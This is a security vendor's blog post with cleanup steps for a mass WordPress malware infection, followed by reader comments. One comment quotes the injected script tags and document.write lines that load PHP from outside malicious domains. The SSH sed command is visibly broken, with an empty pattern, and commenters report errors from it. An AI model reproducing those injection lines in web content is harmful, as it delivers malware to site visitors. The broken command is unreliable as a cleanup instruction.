Simple cleanup solution for the latest WordPress hack

If your site was hacked in the latest mass infection of WordPress sites, we have a simple solution to clean it up.

For Network Solutions users:

If your site is at Network Solutions, and you have that “virtual-ad.org” malware, the solution is simple.

Log in via FTP and remove the file cgi-bin/php.ini. That’s all you need to do to protect your users.

You will still have some “.nts” files in there (which you can remove later), but they will not be executed without the php.ini.

Via SSH:

If you have SSH access to your server, run the following commands from your web root:

$ find ./ -name "*.php" -type f | \
  xargs sed -i 's###g' 2>&1
$ find ./ -name "*.php" -type f | \
  xargs sed -i '/./,$!d' 2>&1

Via web:

If you don’t have SSH access, download this file to your desktop:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt and rename it to wordpress-fix.php.

After that, upload it to your site via FTP, and run it (using your browser) as: http://yoursite.com/wordpress-fix.php

This script will take a few minutes to complete, but will scan your whole site and remove the malware entries.

Once you are done, go back to your site and remove this file.

That’s it and you should be clean again.

UPDATE: If your site is not getting cleaned up after you run it (or you are getting extra empty lines at the top of your files), it means that the script didn’t finish running properly. Try running it again. If that doesn’t help, upload it to some subdirectories (like wp-admin, wp-content and wp-includes) and run it directly from there. For example:
http://yoursite.com/wp-admin/wordpress-fix.php , http://yoursite.com/wp-content/wordpress-fix.php , etc.
That should fix it!
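
An added example, not part of the original post and not Sucuri's fix script: a shell helper that lists the cgi-bin/php.ini and .nts files named above, reports PHP files that start with empty lines, and strips those lines with the post's own `/./,$!d` sed expression after copying each original to a backup directory. The function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not Sucuri's script). Function names are hypothetical.
# ROOT is the web root, given without a trailing slash.

# Print cgi-bin/php.ini (if present) and every *.nts file under ROOT.
list_artifacts() {
    [ -f "$1/cgi-bin/php.ini" ] && echo "$1/cgi-bin/php.ini"
    find "$1" -type f -name '*.nts' | sort
}

# Print non-empty PHP files under ROOT whose first line is empty.
list_blank_top() {
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        if [ -s "$f" ] && ! head -n 1 "$f" | grep -q .; then
            echo "$f"
        fi
    done
}

# Copy each affected file to BACKUP (keep it outside the web root so the
# copies are never served as source), then rewrite the file in place with
# the post's '/./,$!d' expression, which drops everything before the first
# non-empty line. Writing with '>' keeps the file's owner and mode.
fix_blank_top() {
    list_blank_top "$1" | while IFS= read -r f; do
        rel=${f#"$1"/}
        mkdir -p "$2/$(dirname "$rel")"
        cp -p "$f" "$2/$rel" &&
            sed '/./,$!d' "$2/$rel" > "$f" &&
            echo "fixed: $rel"
    done
}

# Constructed sample tree: the two artifacts, one affected and one clean file.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/cgi-bin" "$d/wp-admin"
    : > "$d/cgi-bin/php.ini"
    : > "$d/cgi-bin/a.nts"
    printf '\n\n<?php echo "index"; ?>\n' > "$d/index.php"
    printf '<?php echo "ok"; ?>\n' > "$d/wp-admin/ok.php"
    echo "$d"
}

root=$(make_sample_root)
backup=$(mktemp -d)
list_artifacts "$root"
fix_blank_top "$root" "$backup"
rm -rf "$root" "$backup"
```

Running `list_blank_top` on its own first gives a dry-run list of the files that `fix_blank_top` would rewrite.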

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if any of them ever gets infected with malware, hacked or blacklisted.

121 Responses to Simple cleanup solution for the latest WordPress hack

  1. Anonymous says:

    Hello Guys,

    I am also a victim. My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It's an RFI attack. Hope you all be happy with this. The attacker first distributes a free program (open source) which works fine, but he puts a security hole in it for later use. He wins the faith from us and then attacks.

  2. Amy says:

    Thank you so much!

  3. Pingback: Tweets that mention Simple cleanup solution for the latest Wordpress hack | Sucuri Security -- Topsy.com

  4. Pingback: WordPress-based, GoDaddy-hosted websites hacked

  5. james says:

    If you are on Media Temple, I had 5 blogs, found WordPress templates infected. I suspect my laptop was the first victim via malware, although not sure. Cleaned that up. Then used script from here. Cleaned it each time, but every day I would see somehow the hackers had reuploaded new exploit-laden akismet plugins onto the server. My latest discovery was that in the folder etc if you log in using FTP, they infected my php.ini file. You need to remove the last line on that file and then delete the sample.php.ini file which hosted malware. Now all clean again, but waiting for a few days to see if they come back (wish me luck!)

  6. Bruce says:

    Thank you so much for the Quick Fix! So far everything looks good but will keep an eye on it.

  7. Pingback: Attack on Wordpress – "http://www.indesignstudioinfo.com/ls.php" – Themes 'n' Templates Base

  8. MacMyDay says:

    i run this script and i find that i get an error:

    -bash: : command not found
    running this:
    $ find ./ -name "*.php" -type f | xargs sed -i 's###g' 2>&1

  9. Evan says:

    My WP was hacked on bluehost (3 sites). I ran the script but still see suspicious JavaScript in my footer when I view the page source in the browser. You can see it at internetincomeformula.com. I have viewed the theme editor in the admin looking for this code in the footer. It is nowhere to be found. But when I view the page source code in my browser I can see this JavaScript. How do I remove it?

  10. eckert says:

    i ran this on 5 WP sites, only to then find them all white-screened. i was able to find the malicious code on a couple of them, but it's not showing up on one in particular. if anyone has any suggestions, they would be much appreciated.

  11. Pingback: Yet another series of attacks – This time using whereisdudescars.com | Sucuri

  12. sang truong says:

    Seems like everyone has got it to work but I am having so many problems. I keep getting a 404 or
    Warning: Unexpected character in input: ” (ASCII=92) state=1

    Parse error: syntax error, unexpected T_STRING

    Appreciate any help

  13. mauma says:

    good, but if you have installed nextgenGallery remove the plug-in code that is used instead.
    make sure that your plug-ins do not use encode_64 before making this operation

  14. George says:

    All my PHP files were infected by:

    All my HTML files were infected by:
    <script src =http:// rubydistributions. com/imgs/cardgood .php >
    All my “js” files were infected by:
    document.write(‘<script src =http:// rustytolin. com/images/gifimg. php >’);

    document.write(‘<script src = http:// rubydistributions. com /imgs/cardgood . php >’);

    It was only the one attack and so many kind of files were infected.

  15. George says:

    Also, the malware creates infected files "robots.php" and gifimg.php in the "images" category of the website

  16. Rick says:

    Please help me perform this step:
    If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p... and rename it to wordpress-fix.php.

    How do you download a 'text' file to your desktop? Thanks.

  18. Michelle says:

    I used it on my main domain and then some sub directories and got two different results. I'm assuming one means it ran and was ok, then the other means it found something and cleaned it up. Is that right? I'm pasting them below.

    1. Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    2. Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    Malware removed.
    Empty lines removed.

    Completed.

  19. Marisa says:

    This worked for me but I had to run it several times and place it in my wp-admin directory on some of my blogs. Of 11 WP blogs, only the one at the root had to be run repeatedly. Also, I found a file, wtm.php that had nothing but the malicious code. I blew that one away manually.

    Since this is the third time I’ve been infected, my question now is how do I protect my blogs? Is there any way to make WordPress secure? My WP is updated, I’ve placed recommended in my htaccess file and placed that file in each of my wp-admin directories. Is there anything else I can do? I really don’t have time to do this every few days and I don’t have the money to hire someone else to do it for me.

    Any ideas on how to secure WP?

  20. Anon says:

    When I run the command from ssh I get:

    -bash: 1$: ambiguous redirect
    -bash: : command not found
